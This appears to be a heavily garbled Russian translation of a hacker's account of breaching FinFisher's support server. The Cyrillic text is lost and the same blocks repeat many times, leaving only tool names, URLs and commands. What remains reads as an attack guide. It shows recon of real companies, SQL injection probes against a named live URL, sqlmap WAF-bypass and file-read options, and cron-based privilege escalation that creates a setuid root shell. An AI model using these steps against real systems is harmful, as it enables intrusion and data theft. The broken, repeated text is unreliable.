    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  4. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  5. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  6. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  7. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :
